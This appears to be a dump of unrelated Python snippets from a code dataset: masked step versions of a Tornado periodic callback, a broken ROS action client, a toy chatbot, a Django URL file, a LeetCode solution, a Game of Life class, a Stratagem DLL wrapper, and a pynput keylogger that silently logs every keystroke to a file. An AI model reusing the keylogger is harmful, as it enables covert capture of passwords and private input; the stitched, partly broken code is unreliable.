"step-1": "<mask token>\n\n\nclass YieldPeriodicCallback(object):\n <mask token>\n\n def __init__(self, callback, callback_time, io_loop=None, faststart=False):\n \"\"\"Init method it can be used like tornado periodic callback, but it has\n extra paramtetr\n :param faststart: if true callback will be run after application start\n \"\"\"\n self.callback = callback\n if callback_time <= 0:\n raise ValueError(\n 'Periodic callback must have a positive callback_time')\n self.callback_time = callback_time\n self.io_loop = io_loop or tornado.ioloop.IOLoop.current()\n self._running = False\n self._timeout = None\n if faststart:\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n\n def start(self):\n \"\"\"Starts the timer\"\"\"\n if self._running:\n return\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._schedule_next()\n\n def stop(self):\n \"\"\"Stops the timer\"\"\"\n self._running = False\n if self._timeout is not None:\n self.io_loop.remove_timeout(self._timeout)\n self._timeout = None\n <mask token>\n\n def _schedule_next(self):\n \"\"\"Schedule next callback method\"\"\"\n if self._running:\n current_time = self.io_loop.time()\n while self._next_timeout <= current_time:\n self._next_timeout += self.callback_time / 1000.0\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n",
"step-2": "<mask token>\n\n\nclass YieldPeriodicCallback(object):\n <mask token>\n\n def __init__(self, callback, callback_time, io_loop=None, faststart=False):\n \"\"\"Init method it can be used like tornado periodic callback, but it has\n extra paramtetr\n :param faststart: if true callback will be run after application start\n \"\"\"\n self.callback = callback\n if callback_time <= 0:\n raise ValueError(\n 'Periodic callback must have a positive callback_time')\n self.callback_time = callback_time\n self.io_loop = io_loop or tornado.ioloop.IOLoop.current()\n self._running = False\n self._timeout = None\n if faststart:\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n\n def start(self):\n \"\"\"Starts the timer\"\"\"\n if self._running:\n return\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._schedule_next()\n\n def stop(self):\n \"\"\"Stops the timer\"\"\"\n self._running = False\n if self._timeout is not None:\n self.io_loop.remove_timeout(self._timeout)\n self._timeout = None\n\n @tornado.gen.coroutine\n def _run(self):\n \"\"\"Run the run method and schedule next time\"\"\"\n if not self._running:\n return\n try:\n yield self.callback()\n except Exception:\n logging.error('Error in periodic callback', exc_info=True)\n self._schedule_next()\n\n def _schedule_next(self):\n \"\"\"Schedule next callback method\"\"\"\n if self._running:\n current_time = self.io_loop.time()\n while self._next_timeout <= current_time:\n self._next_timeout += self.callback_time / 1000.0\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n",
"step-3": "<mask token>\n\n\nclass YieldPeriodicCallback(object):\n \"\"\"Class for better periodic call\"\"\"\n\n def __init__(self, callback, callback_time, io_loop=None, faststart=False):\n \"\"\"Init method it can be used like tornado periodic callback, but it has\n extra paramtetr\n :param faststart: if true callback will be run after application start\n \"\"\"\n self.callback = callback\n if callback_time <= 0:\n raise ValueError(\n 'Periodic callback must have a positive callback_time')\n self.callback_time = callback_time\n self.io_loop = io_loop or tornado.ioloop.IOLoop.current()\n self._running = False\n self._timeout = None\n if faststart:\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n\n def start(self):\n \"\"\"Starts the timer\"\"\"\n if self._running:\n return\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._schedule_next()\n\n def stop(self):\n \"\"\"Stops the timer\"\"\"\n self._running = False\n if self._timeout is not None:\n self.io_loop.remove_timeout(self._timeout)\n self._timeout = None\n\n @tornado.gen.coroutine\n def _run(self):\n \"\"\"Run the run method and schedule next time\"\"\"\n if not self._running:\n return\n try:\n yield self.callback()\n except Exception:\n logging.error('Error in periodic callback', exc_info=True)\n self._schedule_next()\n\n def _schedule_next(self):\n \"\"\"Schedule next callback method\"\"\"\n if self._running:\n current_time = self.io_loop.time()\n while self._next_timeout <= current_time:\n self._next_timeout += self.callback_time / 1000.0\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n",
"step-4": "<mask token>\nimport tornado\nimport tornado.gen\nimport logging\n\n\nclass YieldPeriodicCallback(object):\n \"\"\"Class for better periodic call\"\"\"\n\n def __init__(self, callback, callback_time, io_loop=None, faststart=False):\n \"\"\"Init method it can be used like tornado periodic callback, but it has\n extra paramtetr\n :param faststart: if true callback will be run after application start\n \"\"\"\n self.callback = callback\n if callback_time <= 0:\n raise ValueError(\n 'Periodic callback must have a positive callback_time')\n self.callback_time = callback_time\n self.io_loop = io_loop or tornado.ioloop.IOLoop.current()\n self._running = False\n self._timeout = None\n if faststart:\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n\n def start(self):\n \"\"\"Starts the timer\"\"\"\n if self._running:\n return\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._schedule_next()\n\n def stop(self):\n \"\"\"Stops the timer\"\"\"\n self._running = False\n if self._timeout is not None:\n self.io_loop.remove_timeout(self._timeout)\n self._timeout = None\n\n @tornado.gen.coroutine\n def _run(self):\n \"\"\"Run the run method and schedule next time\"\"\"\n if not self._running:\n return\n try:\n yield self.callback()\n except Exception:\n logging.error('Error in periodic callback', exc_info=True)\n self._schedule_next()\n\n def _schedule_next(self):\n \"\"\"Schedule next callback method\"\"\"\n if self._running:\n current_time = self.io_loop.time()\n while self._next_timeout <= current_time:\n self._next_timeout += self.callback_time / 1000.0\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n",
"step-5": "\"\"\"Class for better periodic call handling\"\"\"\nimport tornado\nimport tornado.gen\nimport logging\n\nclass YieldPeriodicCallback(object):\n \"\"\"Class for better periodic call\"\"\"\n\n def __init__(self, callback, callback_time, io_loop=None, faststart=False):\n \"\"\"Init method it can be used like tornado periodic callback, but it has\n extra paramtetr\n :param faststart: if true callback will be run after application start\n \"\"\"\n self.callback = callback\n if callback_time <= 0:\n raise ValueError(\"Periodic callback must have a positive callback_time\")\n self.callback_time = callback_time\n self.io_loop = io_loop or tornado.ioloop.IOLoop.current()\n self._running = False\n self._timeout = None\n\n if faststart:\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._timeout = self.io_loop.add_timeout(self._next_timeout, self._run)\n\n def start(self):\n \"\"\"Starts the timer\"\"\"\n if self._running:\n return\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._schedule_next()\n\n def stop(self):\n \"\"\"Stops the timer\"\"\"\n self._running = False\n if self._timeout is not None:\n self.io_loop.remove_timeout(self._timeout)\n self._timeout = None\n\n @tornado.gen.coroutine\n def _run(self):\n \"\"\"Run the run method and schedule next time\"\"\"\n if not self._running:\n return\n try:\n yield self.callback()\n except Exception: # pylint: disable=W0703\n logging.error(\"Error in periodic callback\", exc_info=True)\n self._schedule_next()\n\n def _schedule_next(self):\n \"\"\"Schedule next callback method\"\"\"\n if self._running:\n current_time = self.io_loop.time()\n while self._next_timeout <= current_time:\n self._next_timeout += self.callback_time / 1000.0\n self._timeout = self.io_loop.add_timeout(self._next_timeout, self._run)\n\n\n\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
#! /usr/bin/env python
import roslib
roslib.load_manifest('learning_tf')
import rospy
import actionlib
from geometry_msgs.msg import Twist
from turtlesim.msg import Pose
from goal.msg import moveAction, moveGoal
if __name__ == '__main__':
rospy.init_node('move_client')
client = actionlib.SimpleActionClient('moveTo', turtlesim_)
client.wait_for_server()
goal = DoDishesGoal()
# Fill in the goal here
client.send_goal(goal)
client.wait_for_result(rospy.Duration.from_sec(5.0))
|
normal
|
{
"blob_id": "791935f63f7a0ab2755ad33369d2afa8c10dffbb",
"index": 4708,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nroslib.load_manifest('learning_tf')\n<mask token>\nif __name__ == '__main__':\n rospy.init_node('move_client')\n client = actionlib.SimpleActionClient('moveTo', turtlesim_)\n client.wait_for_server()\n goal = DoDishesGoal()\n client.send_goal(goal)\n client.wait_for_result(rospy.Duration.from_sec(5.0))\n",
"step-3": "import roslib\nroslib.load_manifest('learning_tf')\nimport rospy\nimport actionlib\nfrom geometry_msgs.msg import Twist\nfrom turtlesim.msg import Pose\nfrom goal.msg import moveAction, moveGoal\nif __name__ == '__main__':\n rospy.init_node('move_client')\n client = actionlib.SimpleActionClient('moveTo', turtlesim_)\n client.wait_for_server()\n goal = DoDishesGoal()\n client.send_goal(goal)\n client.wait_for_result(rospy.Duration.from_sec(5.0))\n",
"step-4": "#! /usr/bin/env python\nimport roslib\nroslib.load_manifest('learning_tf')\n\nimport rospy\nimport actionlib\nfrom geometry_msgs.msg import Twist\nfrom turtlesim.msg import Pose\n\nfrom goal.msg import moveAction, moveGoal\n\nif __name__ == '__main__':\n rospy.init_node('move_client')\n client = actionlib.SimpleActionClient('moveTo', turtlesim_)\n client.wait_for_server()\n\n goal = DoDishesGoal()\n # Fill in the goal here\n client.send_goal(goal)\n client.wait_for_result(rospy.Duration.from_sec(5.0))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#this apps is open
#Let's start with introduction
print "Hi, I am x0x. Could we introduce ourselves? (yes/no)"
answer = raw_input()
if answer.lower() == 'yes':
print "Okay, what is your name?"
name = raw_input()
print "Hi", name
print "Nice to meet you."
print "What are you going to do?"
print '1. Say "good bye"'
print '2. Say "Thank you"'
answer = raw_input()
if answer == '1':
print 'Well, good bye', name
elif answer == '2':
print 'Sakalangkong', name
else:
print 'You choose wrong answer, I am terminated.'
print 'bye'
elif answer.lower() == 'no':
print "thank you"
else:
print "your answer is wrong"
print "Please come back later. Thank you!"
print "yoyoi oke"
|
normal
|
{
"blob_id": "a28c62a18d793fb285353902d01801c720bcb454",
"index": 1653,
"step-1": "#this apps is open\n\n#Let's start with introduction\n\nprint \"Hi, I am x0x. Could we introduce ourselves? (yes/no)\"\nanswer = raw_input()\nif answer.lower() == 'yes':\n print \"Okay, what is your name?\"\n name = raw_input()\n print \"Hi\", name\n print \"Nice to meet you.\"\n print \"What are you going to do?\"\n print '1. Say \"good bye\"'\n print '2. Say \"Thank you\"'\n answer = raw_input()\n if answer == '1':\n print 'Well, good bye', name\n elif answer == '2':\n print 'Sakalangkong', name\n else:\n print 'You choose wrong answer, I am terminated.'\n print 'bye'\nelif answer.lower() == 'no':\n print \"thank you\"\nelse:\n print \"your answer is wrong\"\n print \"Please come back later. Thank you!\"\n print \"yoyoi oke\"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from django.contrib import admin
from django.urls import path
from . import views
urlpatterns = [
path('', views.artifact, name="artifacts"),
path('<int:artifact_id>', views.detail, name="detail"),
path('register/', views.register, name="register")
]
|
normal
|
{
"blob_id": "9b73037e8af7d4f91261cebf895b68650182fcd5",
"index": 2780,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('', views.artifact, name='artifacts'), path(\n '<int:artifact_id>', views.detail, name='detail'), path('register/',\n views.register, name='register')]\n",
"step-3": "from django.contrib import admin\nfrom django.urls import path\nfrom . import views\nurlpatterns = [path('', views.artifact, name='artifacts'), path(\n '<int:artifact_id>', views.detail, name='detail'), path('register/',\n views.register, name='register')]\n",
"step-4": "from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.artifact, name=\"artifacts\"),\n path('<int:artifact_id>', views.detail, name=\"detail\"),\n path('register/', views.register, name=\"register\")\n]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#
# @lc app=leetcode.cn id=909 lang=python3
#
# [909] 蛇梯棋
#
# @lc code=start
from typing import List
class Solution:
def snakesAndLadders(self, board: List[List[int]]) -> int:
N = len(board)
def get_pos(num):
r = (num-1) // N
c = (num-1) % N
c = c if ((r+1) & 1) else (N-1 - c)
r = N-1 - r
return r, c
# r, c = get_pos(20)
# print(r, c)
def skip(num):
r, c = get_pos(num)
if board[r][c] != -1:
return board[r][c]
else:
return num
from collections import deque
dq = deque([1])
vis = set([1])
step = -1
while dq:
sz = len(dq)
step += 1
for _ in range(sz):
node = dq.popleft()
if (node == N*N):
return step
for i in range(1, 7):
new_node = node + i
if (new_node > N*N):
continue
new_node = skip(new_node)
if (new_node not in vis):
dq.append(new_node)
vis.add(new_node)
return -1
""" 21-06-27 每日一题打卡BFS
Accepted
211/211 cases passed (100 ms)
Your runtime beats 99.08 % of python3 submissions
Your memory usage beats 14.68 % of python3 submissions (15.1 MB)
"""
# board = [[-1,-1,-1,-1,-1,-1],
# [-1,-1,-1,-1,-1,-1],
# [-1,-1,-1,-1,-1,-1],
# [-1,35,-1,-1,13,-1],
# [-1,-1,-1,-1,-1,-1],
# [-1,15,-1,-1,-1,-1]]
# s = Solution().snakesAndLadders(board)
# print(s)
# @lc code=end
|
normal
|
{
"blob_id": "da5a366d1cc4f192a220dc38c7a74aeb3fba7cdb",
"index": 9839,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def snakesAndLadders(self, board: List[List[int]]) ->int:\n N = len(board)\n\n def get_pos(num):\n r = (num - 1) // N\n c = (num - 1) % N\n c = c if r + 1 & 1 else N - 1 - c\n r = N - 1 - r\n return r, c\n\n def skip(num):\n r, c = get_pos(num)\n if board[r][c] != -1:\n return board[r][c]\n else:\n return num\n from collections import deque\n dq = deque([1])\n vis = set([1])\n step = -1\n while dq:\n sz = len(dq)\n step += 1\n for _ in range(sz):\n node = dq.popleft()\n if node == N * N:\n return step\n for i in range(1, 7):\n new_node = node + i\n if new_node > N * N:\n continue\n new_node = skip(new_node)\n if new_node not in vis:\n dq.append(new_node)\n vis.add(new_node)\n return -1\n\n\n<mask token>\n",
"step-4": "from typing import List\n\n\nclass Solution:\n\n def snakesAndLadders(self, board: List[List[int]]) ->int:\n N = len(board)\n\n def get_pos(num):\n r = (num - 1) // N\n c = (num - 1) % N\n c = c if r + 1 & 1 else N - 1 - c\n r = N - 1 - r\n return r, c\n\n def skip(num):\n r, c = get_pos(num)\n if board[r][c] != -1:\n return board[r][c]\n else:\n return num\n from collections import deque\n dq = deque([1])\n vis = set([1])\n step = -1\n while dq:\n sz = len(dq)\n step += 1\n for _ in range(sz):\n node = dq.popleft()\n if node == N * N:\n return step\n for i in range(1, 7):\n new_node = node + i\n if new_node > N * N:\n continue\n new_node = skip(new_node)\n if new_node not in vis:\n dq.append(new_node)\n vis.add(new_node)\n return -1\n\n\n<mask token>\n",
"step-5": "#\n# @lc app=leetcode.cn id=909 lang=python3\n#\n# [909] 蛇梯棋\n#\n\n# @lc code=start\nfrom typing import List\nclass Solution:\n def snakesAndLadders(self, board: List[List[int]]) -> int:\n N = len(board)\n def get_pos(num):\n r = (num-1) // N\n c = (num-1) % N\n c = c if ((r+1) & 1) else (N-1 - c) \n r = N-1 - r\n return r, c\n # r, c = get_pos(20)\n # print(r, c)\n def skip(num):\n r, c = get_pos(num)\n if board[r][c] != -1:\n return board[r][c]\n else:\n return num\n from collections import deque\n dq = deque([1])\n vis = set([1])\n step = -1\n while dq:\n sz = len(dq)\n step += 1\n for _ in range(sz):\n node = dq.popleft()\n if (node == N*N):\n return step\n for i in range(1, 7):\n new_node = node + i\n if (new_node > N*N):\n continue\n new_node = skip(new_node)\n if (new_node not in vis):\n dq.append(new_node)\n vis.add(new_node)\n\n return -1\n\n\"\"\" 21-06-27 每日一题打卡BFS\nAccepted\n211/211 cases passed (100 ms)\nYour runtime beats 99.08 % of python3 submissions\nYour memory usage beats 14.68 % of python3 submissions (15.1 MB)\n\"\"\"\n\n# board = [[-1,-1,-1,-1,-1,-1],\n# [-1,-1,-1,-1,-1,-1],\n# [-1,-1,-1,-1,-1,-1],\n# [-1,35,-1,-1,13,-1],\n# [-1,-1,-1,-1,-1,-1],\n# [-1,15,-1,-1,-1,-1]]\n\n# s = Solution().snakesAndLadders(board)\n# print(s)\n\n# @lc code=end\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from pynput import keyboard
# list of chars entered by the user
list = []
number_of_chars = 0
# if entered chars go above MAX LENGTH they will be written inside a file
MAX_LENGTH = 300
def on_press(key):
global number_of_chars
global list
list.append(key)
number_of_chars+=1
if number_of_chars>=MAX_LENGTH:
write_in_file()
list.clear()
number_of_chars = 0
def on_release(key):
if key == keyboard.Key.esc:
# if the user exist write all the contents inside the file
write_in_file()
return False
def write_in_file():
file = open("strokes.txt","a")
for k in list:
file.writelines("{}\n".format(str(k)))
file.close()
# erases contents of the file when the program is runned
open("strokes.txt","w").close()
with keyboard.Listener(on_press = on_press,on_release=on_release) as listener:
listener.join()
|
normal
|
{
"blob_id": "e60fcf19560b4826577797c8ae8b626ff984dcfd",
"index": 6923,
"step-1": "<mask token>\n\n\ndef on_release(key):\n if key == keyboard.Key.esc:\n write_in_file()\n return False\n\n\ndef write_in_file():\n file = open('strokes.txt', 'a')\n for k in list:\n file.writelines('{}\\n'.format(str(k)))\n file.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef on_press(key):\n global number_of_chars\n global list\n list.append(key)\n number_of_chars += 1\n if number_of_chars >= MAX_LENGTH:\n write_in_file()\n list.clear()\n number_of_chars = 0\n\n\ndef on_release(key):\n if key == keyboard.Key.esc:\n write_in_file()\n return False\n\n\ndef write_in_file():\n file = open('strokes.txt', 'a')\n for k in list:\n file.writelines('{}\\n'.format(str(k)))\n file.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef on_press(key):\n global number_of_chars\n global list\n list.append(key)\n number_of_chars += 1\n if number_of_chars >= MAX_LENGTH:\n write_in_file()\n list.clear()\n number_of_chars = 0\n\n\ndef on_release(key):\n if key == keyboard.Key.esc:\n write_in_file()\n return False\n\n\ndef write_in_file():\n file = open('strokes.txt', 'a')\n for k in list:\n file.writelines('{}\\n'.format(str(k)))\n file.close()\n\n\nopen('strokes.txt', 'w').close()\nwith keyboard.Listener(on_press=on_press, on_release=on_release) as listener:\n listener.join()\n",
"step-4": "<mask token>\nlist = []\nnumber_of_chars = 0\nMAX_LENGTH = 300\n\n\ndef on_press(key):\n global number_of_chars\n global list\n list.append(key)\n number_of_chars += 1\n if number_of_chars >= MAX_LENGTH:\n write_in_file()\n list.clear()\n number_of_chars = 0\n\n\ndef on_release(key):\n if key == keyboard.Key.esc:\n write_in_file()\n return False\n\n\ndef write_in_file():\n file = open('strokes.txt', 'a')\n for k in list:\n file.writelines('{}\\n'.format(str(k)))\n file.close()\n\n\nopen('strokes.txt', 'w').close()\nwith keyboard.Listener(on_press=on_press, on_release=on_release) as listener:\n listener.join()\n",
"step-5": "from pynput import keyboard\n\n# list of chars entered by the user\nlist = []\nnumber_of_chars = 0\n# if entered chars go above MAX LENGTH they will be written inside a file\nMAX_LENGTH = 300\n\ndef on_press(key):\n global number_of_chars\n global list\n \n list.append(key)\n number_of_chars+=1\n\n\n if number_of_chars>=MAX_LENGTH:\n write_in_file()\n list.clear()\n number_of_chars = 0\n\ndef on_release(key):\n if key == keyboard.Key.esc:\n # if the user exist write all the contents inside the file\n write_in_file()\n return False\n\ndef write_in_file():\n file = open(\"strokes.txt\",\"a\")\n for k in list:\n file.writelines(\"{}\\n\".format(str(k)))\n file.close()\n\n\n\n# erases contents of the file when the program is runned\nopen(\"strokes.txt\",\"w\").close()\n\nwith keyboard.Listener(on_press = on_press,on_release=on_release) as listener:\n listener.join()",
"step-ids": [
2,
3,
4,
5,
7
]
}
|
[
2,
3,
4,
5,
7
] |
class GameOfLife:
@staticmethod
def simulate(board):
for row in range(len(board)):
for col in range(len(board[0])):
ones = GameOfLife.countOnes(board, row, col)
if board[row][col] and (ones == 2 or ones == 3):
board[row][col] |= 2
elif not board[row][col] and ones == 3:
board[row][col] |= 2
for row in range(len(board)):
for col in range(len(board[0])):
board[row][col] >>= 1
@staticmethod
def countOnes(board, row, col):
total = 0
total += GameOfLife.isOne(board, row - 1, col - 1)
total += GameOfLife.isOne(board, row - 1, col)
total += GameOfLife.isOne(board, row - 1, col + 1)
total += GameOfLife.isOne(board, row, col - 1)
total += GameOfLife.isOne(board, row, col + 1)
total += GameOfLife.isOne(board, row + 1, col - 1)
total += GameOfLife.isOne(board, row + 1, col)
total += GameOfLife.isOne(board, row + 1, col + 1)
return total
@staticmethod
def isOne(board, row, col):
if row >= len(board) or row < 0:
return 0
if col >= len(board) or col < 0:
return 0
return board[row][col] & 1
|
normal
|
{
"blob_id": "862c5794a4da794678de419f053ae15b11bca6e7",
"index": 7453,
"step-1": "class GameOfLife:\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "class GameOfLife:\n\n @staticmethod\n def simulate(board):\n for row in range(len(board)):\n for col in range(len(board[0])):\n ones = GameOfLife.countOnes(board, row, col)\n if board[row][col] and (ones == 2 or ones == 3):\n board[row][col] |= 2\n elif not board[row][col] and ones == 3:\n board[row][col] |= 2\n for row in range(len(board)):\n for col in range(len(board[0])):\n board[row][col] >>= 1\n <mask token>\n <mask token>\n",
"step-3": "class GameOfLife:\n\n @staticmethod\n def simulate(board):\n for row in range(len(board)):\n for col in range(len(board[0])):\n ones = GameOfLife.countOnes(board, row, col)\n if board[row][col] and (ones == 2 or ones == 3):\n board[row][col] |= 2\n elif not board[row][col] and ones == 3:\n board[row][col] |= 2\n for row in range(len(board)):\n for col in range(len(board[0])):\n board[row][col] >>= 1\n\n @staticmethod\n def countOnes(board, row, col):\n total = 0\n total += GameOfLife.isOne(board, row - 1, col - 1)\n total += GameOfLife.isOne(board, row - 1, col)\n total += GameOfLife.isOne(board, row - 1, col + 1)\n total += GameOfLife.isOne(board, row, col - 1)\n total += GameOfLife.isOne(board, row, col + 1)\n total += GameOfLife.isOne(board, row + 1, col - 1)\n total += GameOfLife.isOne(board, row + 1, col)\n total += GameOfLife.isOne(board, row + 1, col + 1)\n return total\n <mask token>\n",
"step-4": "class GameOfLife:\n\n @staticmethod\n def simulate(board):\n for row in range(len(board)):\n for col in range(len(board[0])):\n ones = GameOfLife.countOnes(board, row, col)\n if board[row][col] and (ones == 2 or ones == 3):\n board[row][col] |= 2\n elif not board[row][col] and ones == 3:\n board[row][col] |= 2\n for row in range(len(board)):\n for col in range(len(board[0])):\n board[row][col] >>= 1\n\n @staticmethod\n def countOnes(board, row, col):\n total = 0\n total += GameOfLife.isOne(board, row - 1, col - 1)\n total += GameOfLife.isOne(board, row - 1, col)\n total += GameOfLife.isOne(board, row - 1, col + 1)\n total += GameOfLife.isOne(board, row, col - 1)\n total += GameOfLife.isOne(board, row, col + 1)\n total += GameOfLife.isOne(board, row + 1, col - 1)\n total += GameOfLife.isOne(board, row + 1, col)\n total += GameOfLife.isOne(board, row + 1, col + 1)\n return total\n\n @staticmethod\n def isOne(board, row, col):\n if row >= len(board) or row < 0:\n return 0\n if col >= len(board) or col < 0:\n return 0\n return board[row][col] & 1\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
"""
Main class of the interface.
It setups the experimental parameters such as the :class:`.Experiment`'s and
:class:`.Sample`, geometry (:attr:`geometry <Stratagem.geometry>`), type of
:math:`\\phi(\\rho z)` model (:attr:`prz_mode <Stratagem.prz_mode>`) and
fluorescence mode (:attr:`fluorescence <Stratagem.fluorescence>`).
"""
# Standard library modules.
import os
import ctypes as c
import logging
logger = logging.getLogger(__name__)
from operator import attrgetter
import random
import string
import functools
try:
import winreg
except ImportError:
try:
import _winreg as winreg
except ImportError:
class winreg:
HKEY_CURRENT_USER = None
class _PyHKEY(object):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
pass
def OpenKey(self, key, sub_key, res, sam):
return self._PyHKEY()
def QueryValueEx(self, key, value_name):
return None
# Third party modules.
# Local modules.
from stratagemtools.sample import Sample, CONC_UNKNOWN, CONC_DIFF
from stratagemtools.experiment import Experiment, LINE_KA
from stratagemtools.element_properties import \
atomic_mass_kg_mol, mass_density_kg_m3
# Globals and constants variables.
_REGISTRY_KEY = "Software\SAMx\Stratagem\Configuration"
_REGISTRY_VALUENAME = 'InstallOEMDirectory'
PRZMODE_XPP = 0
""":math:`\\phi(\\rho z)` from XPP"""
PRZMODE_PAP = 1
""":math:`\\phi(\\rho z)` from PAP"""
PRZMODE_GAU = 2
""":math:`\\phi(\\rho z)` *unknown*, possibly two Gaussians"""
FLUORESCENCE_NONE = 0
"""No fluorescence"""
FLUORESCENCE_LINE = 1
"""Only characteristic fluorescence"""
FLUORESCENCE_LINE_CONT = 2
"""Characteristic and Bremsstrahlung fluorescence"""
_CONCENTRATION_FLAG_KNOWN = 0
_CONCENTRATION_FLAG_UNKNOWN = 1
_CONCENTRATION_FLAG_STOICHIOMETRIC = 2
_CONCENTRATION_FLAG_TRACE = 3
_CONCENTRATION_FLAG_DIFFERENCE = 4
class StratagemError(Exception):
"""
Exception raised for all errors related to the STRATAGem interface.
"""
pass
def _check_key(method):
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
if self._key is None:
raise StratagemError('Not initialize. Call init().')
return method(self, *args, **kwargs)
return wrapper
class Stratagem:
"""
Main interface establishing a connection to the STRATAGem OEM interface and
perform calculations using SAMx's STRATAGem.
It is highly recommended to use :class:`Stratagem` as a context manager
(i.e. ``with`` statement) to ensure that the connection to the DLL is
properly closed.
For instance::
>>> with Stratagem() as strata:
... strata.prz_mode = PRZMODE_XPP
Otherwise the following series of method must be called::
>>> strata = Stratagem()
>>> strata.init()
>>> strata.prz_mode = PRZMODE_XPP
>>> strata.close()
"""
def __init__(self, dll_path=None, display_error=True):
"""
:arg dll_path: complete path to the location of ``stratadllogger.dll``
(optional). If ``None``, the path is found in the Windows registry
under ``Software\SAMx\Stratagem\Configuration``. If the DLL is not
found a :class:`StratagemError` is raised.
:type dll_path: :class:`str`
:arg display_error: whether to display a message dialog on error
:type display_error: :class:`bool`
"""
if dll_path is None:
with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY) as key: #@UndefinedVariable
basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0] #@UndefinedVariable
dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')
cwd = os.getcwd()
try:
logger.debug("dll=%s", dll_path)
self._lib = c.WinDLL(dll_path)
finally:
os.chdir(cwd) # Change back to real cwd
logger.debug("StEnableErrorDisplay(%r)", display_error)
self._lib.StEnableErrorDisplay(c.c_bool(display_error))
self._key = None
self._cwd = os.getcwd()
self._layers = {} # layer: index
self._substrate = None
self._experiments = {} # experiment: (element, line, kratio) indexes
self._tmpstandards = []
def __enter__(self):
self.init()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
def _stobjectnew(self, key=None, standard=False):
if key is None:
characters = string.ascii_lowercase
key = ''.join(random.choice(characters) for _ in range(8))
key = key.encode('ascii')
if not isinstance(key, c.c_byte):
key = c.create_string_buffer(key)
bnormal_ = c.c_bool(not standard)
iniflags_ = c.c_int(0)
logger.debug("StObjectNew(key, %r, %i)", not standard, 0)
if not self._lib.StObjectNew(key, bnormal_, iniflags_):
self._raise_error("Cannot create object")
return key
def _raise_error(self, alternate=''):
"""
Raises a :class:`StratagemError`.
The error code and message of known errors are retrieved from STRATAGem.
If this is not possible, *alternate* is used as the error message.
"""
errnum_ = c.c_ulong()
errtype_ = c.c_int()
self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))
if errnum_.value != 0:
if errtype_.value == 0:
buf_ = c.create_string_buffer(256)
self._lib.StGetMsg(errnum_, buf_, 256)
raise StratagemError(buf_.value.decode('ascii'))
elif errtype_.value == 1:
raise c.WinError(errtype_.value)
else:
raise StratagemError('Error %i' % errnum_.value)
else:
raise StratagemError(alternate)
def init(self):
"""
Initializes and setups STRATAGem.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
raise RuntimeError('Already initialized. Call close() first.')
self._key = self._stobjectnew()
self._cwd = os.getcwd()
self.reset()
def close(self):
"""
Closes the connection to the STRATAGem DLL.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
logger.debug('StObjectDelete(key)')
self._lib.StObjectDelete(self._key)
self._key = None
for filepath in self._tmpstandards:
os.remove(filepath)
logger.debug('Remove temporary standard: %s', filepath)
self.reset()
def reset(self):
"""
Resets all parameters to the defaults, remove all experiments and sample.
"""
if self._key:
self._lib.StObjectReset(self._key)
os.chdir(self._cwd)
self._layers.clear() # layer: index
self._substrate = None
self._experiments.clear() # analyzed experiments
self._tmpstandards.clear()
@_check_key
def set_sample(self, sample):
"""
Sets the sample, which will be used in all subsequent calculations.
Note that only one sample can be defined.
:arg sample: sample definition
:type sample: :class:`Sample`
"""
self.reset()
for layer in sample.layers:
index = self._add_layer(layer, substrate=False)
self._layers.setdefault(layer, index)
index = self._add_layer(sample.substrate, substrate=True)
self._substrate = (sample.substrate, index)
@_check_key
def get_sample(self):
"""
Returns the current sample.
It can correspond to the sample defined by :meth:`set_sample` or the
sample resulting from the computations (see :meth:`compute`).
.. note:: a new sample is returned every time this method is called
:return: current sample
:rtype: :class:`Sample`
"""
sample = Sample(self._substrate[0].composition)
for layer in self._layers:
sample.add_layer(layer.composition, layer.thickness_m,
layer.mass_thickness_kg_m2, layer.density_kg_m3)
return sample
sample = property(get_sample, set_sample, doc="Property to set/get sample")
def _add_layer(self, layer, substrate=False, key=None):
"""
Internal method to add a layer from top to bottom.
The last layer added is considered as the substrate.
:arg layer: layer
:type layer: :class:`.Layer`
:return: index of the layer
"""
